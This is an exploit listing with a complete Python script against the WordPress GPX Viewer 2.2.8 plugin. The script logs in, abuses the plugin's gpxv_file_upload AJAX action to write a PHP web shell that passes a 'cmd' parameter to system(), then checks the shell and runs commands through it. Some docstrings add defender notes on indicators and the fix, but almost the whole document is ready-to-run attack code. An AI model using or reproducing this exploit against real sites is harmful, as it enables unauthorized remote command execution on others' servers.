WordPress GPX Viewer 2.2.8 Arbitrary File Creation Exploit

🗓️ 13 Mar 2025 00:00:00Reported by NxploitedType 

This exploit targets WordPress GPX Viewer 2.2.8 and enables arbitrary file creation through the plugin's vulnerability.

import argparse
import requests
from requests.sessions import Session
import time

banner = """
 ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██╗  ██╗       ██╗ ██████╗  ██████╗ ██████╗  █████╗ 
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██║  ██║      ███║██╔═████╗██╔════╝ ╚════██╗██╔══██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████║█████╗╚██║██║██╔██║███████╗  █████╔╝╚██████║
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝ ██║████╔╝██║██╔═══██╗██╔═══╝  ╚═══██║
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗     ██║       ██║╚██████╔╝╚██████╔╝███████╗ █████╔╝
 ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝     ╚═╝       ╚═╝ ╚═════╝  ╚═════╝ ╚══════╝ ╚════╝ 
                        Exploit by : Nxploit \ Khaled alEnazi                                                                                  
"""

print(banner)  # module-level side effect: the banner is printed on import, not only when run as a script

def parse_arguments():
    """Parse the command-line options for this script.

    Returns the argparse namespace with ``url``, ``username`` and ``password``;
    all three options are required, so argparse exits with usage on omission.
    """
    arg_parser = argparse.ArgumentParser(
        description='Exploit a vulnerability in a WordPress plugin allowing file upload.'
    )
    required_options = (
        ('-u', '--url', 'Target URL'),
        ('-un', '--username', 'Username for login'),
        ('-p', '--password', 'Password for login'),
    )
    for short_flag, long_flag, help_text in required_options:
        arg_parser.add_argument(short_flag, long_flag, required=True, help=help_text)
    return arg_parser.parse_args()

def create_session():
    """Return a requests ``Session`` whose default User-Agent header imitates Firefox 128 on Linux.

    No cookies or other headers are preset; the session is reused by the later
    login and upload steps so that cookies persist between requests.
    """
    http_session = Session()
    http_session.headers["User-Agent"] = (
        "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
    )
    return http_session

def get_wordpress_version(url):
    """Fetch the plugin's public ``readme.txt`` and return its ``Stable tag`` value.

    Uses the module-level ``requests`` API (not the shared session) with TLS
    verification disabled. Returns ``None`` when the readme is not served with
    HTTP 200 or contains no line starting with ``Stable tag:``.
    """
    readme_url = f'{url}/wp-content/plugins/gpx-viewer/readme.txt'
    readme_response = requests.get(readme_url, verify=False)
    time.sleep(2)  # Wait for 2 seconds
    if readme_response.status_code != 200:
        return None
    tag_prefix = "Stable tag:"
    for readme_line in readme_response.text.splitlines():
        if not readme_line.startswith(tag_prefix):
            continue
        # Everything after the first colon is the version string.
        return readme_line.split(":")[1].strip()
    return None

def check_version(version):
    """Return a truthy value when *version* is at or below the known-affected ``2.2.8``.

    NOTE(review): this is a plain string comparison, not a numeric one, so
    multi-digit components compare lexicographically (e.g. ``"2.2.10"`` sorts
    before ``"2.2.8"``); treat the result as a heuristic only. When *version*
    is ``None`` or empty, that falsy value is returned unchanged.
    """
    vulnerable_version = "2.2.8"
    return version and version <= vulnerable_version

def login(session, url, username, password):
    """Post credentials to ``wp-login.php`` and report whether a login cookie was set.

    Success is judged only by the presence of a cookie whose name contains
    ``wordpress_logged_in`` in the session's cookie jar after the request;
    the response body and status are not inspected.
    """
    form_fields = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In',
    }
    session.post(f'{url}/wp-login.php', data=form_fields, verify=False)
    time.sleep(2)  # Wait for 2 seconds
    cookie_names = [cookie.name for cookie in session.cookies]
    return any('wordpress_logged_in' in name for name in cookie_names)

def upload_payload(session, url):
    """POST a hand-built multipart body to ``admin-ajax.php`` and return whether HTTP 200 came back.

    The form carries ``action=gpxv_file_upload``, ``category=uncategorized``,
    ``filename=nxploit_exploit.php`` and a ``gpx`` part holding the PHP text
    below, i.e. the server-side handler is asked to write a ``.php`` file under
    a caller-chosen name.
    Defender note: the indicator is an ``admin-ajax.php`` request with this
    action and a filename that is not a ``.gpx`` file; a server-side extension
    allow-list on the upload handler is the expected fix. A 200 status alone
    does not prove the file was written - ``main`` relies on ``check_shell``
    for that.
    """
    upload_url = f'{url}/wp-admin/admin-ajax.php'
    # Content of the "gpx" part; reproduced verbatim from the listing.
    payload = '''<?php  
if(isset($_GET['cmd'])) {  
    system($_GET['cmd']);  
}  
?>'''
    # The multipart body is assembled by hand instead of via requests' files= support.
    boundary = '---------------------------267455711524671334248015039'
    body = f"""
--{boundary}
Content-Disposition: form-data; name="action"

gpxv_file_upload
--{boundary}
Content-Disposition: form-data; name="category"

uncategorized
--{boundary}
Content-Disposition: form-data; name="filename"

nxploit_exploit.php
--{boundary}
Content-Disposition: form-data; name="gpx"

{payload}
--{boundary}--
"""
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
    }
    response = session.post(upload_url, data=body, headers=headers)
    time.sleep(2)  # Wait for 2 seconds
    return response.status_code == 200

def check_shell(session, url):
    """Request the uploaded file's expected URL and return it on HTTP 200, else ``None``.

    The path is fixed to ``wp-content/uploads/gpx/uncategorized/nxploit_exploit.php``,
    matching the ``category`` and ``filename`` fields sent by ``upload_payload``.
    Defender note: a request for a ``.php`` file under ``wp-content/uploads``
    is the artefact to alert on at this stage.
    """
    shell_url = f'{url}/wp-content/uploads/gpx/uncategorized/nxploit_exploit.php'
    response = session.get(shell_url, verify=False)
    time.sleep(2)  # Wait for 2 seconds
    if response.status_code == 200:
        print("[+] Shell uploaded successfully.")
        print(f"[+] Shell URL: {shell_url}")
        return shell_url
    print("[-] Shell upload failed.")
    return None

def execute_command(session, shell_url, cmd):
    """Send *cmd* to the uploaded file via its ``cmd`` query parameter and print the response body.

    Defender note: the observable artefact is a GET to the uploaded ``.php``
    path carrying a ``cmd`` parameter; the response text is printed verbatim.
    Returns ``None``.
    """
    response = session.get(f'{shell_url}?cmd={cmd}', verify=False)
    print(f"[+] Command output:\n{shell_url}?cmd={cmd}\n{response.text}")
    print("\nExample commands:\nls = show files\nuname -a = show system information\n")

def main():
    """Run the full chain: version check, login, upload, verification, one command.

    Exits early (returning ``None``) when the plugin version cannot be read or
    ``check_version`` rejects it, when login yields no login cookie, or when the
    upload request does not return HTTP 200. Every step prints a ``[+]``/``[-]``
    status line.
    """
    args = parse_arguments()
    session = create_session()
    
    version = get_wordpress_version(args.url)
    if version:
        print(f"[+] WordPress plugin version: {version}")
        if check_version(version):
            print("[+] Vulnerable version detected. Proceeding with exploitation...")
        else:
            print("[-] Version not vulnerable. Exiting.")
            return
    else:
        print("[-] Could not determine plugin version. Exiting.")
        return
    
    if login(session, args.url, args.username, args.password):
        print("[+] Logged in successfully.")
        if upload_payload(session, args.url):
            print("[+] Shell uploaded. Checking shell...")
            # check_shell is the only confirmation that the file actually exists on the server.
            shell_url = check_shell(session, args.url)
            if shell_url:
                execute_command(session, shell_url, "ls")
        else:
            print("[-] Failed to upload shell.")
    else:
        print("[-] Failed to log in.")

if __name__ == "__main__":
    main()

